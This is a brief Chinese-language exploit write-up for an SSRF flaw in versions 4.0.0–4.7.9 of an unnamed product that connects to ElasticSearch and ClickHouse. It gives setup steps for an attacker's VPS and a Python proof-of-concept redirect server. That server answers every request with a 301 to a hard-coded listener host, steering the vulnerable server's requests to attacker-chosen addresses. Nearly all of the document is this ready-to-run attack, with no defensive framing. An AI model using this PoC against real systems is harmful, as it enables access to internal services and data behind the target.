在其4.0.0到4.7.9版本之间，连接 ElasticSearch 和 ClickHouse 数据库时存在一处服务端请求伪造漏洞（SSRF）。

VPS开启HTTP服务

VPS 开启HTTP 再同时跑POC

确保能访问poc里的链接文件

第一是目标地址

第二个是跳转地址

第三个是监听地址

如果想切换监听端口

poc：

import SimpleHTTPServer
import SocketServer

def redirect_handler_factory(url):

    class RedirectHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
       def do_GET(self):
           self.send_response(301)
           self.send_header('Location', url)
           self.end_headers()

    return RedirectHandler


def main():

    redirectHandler = redirect_handler_factory("http://192.168.62.143:8000/1.txt")

    handler = SocketServer.TCPServer(("", 80), redirectHandler)
    print("serving at port 80")
    handler.serve_forever()

if __name__ == "__main__":
    main()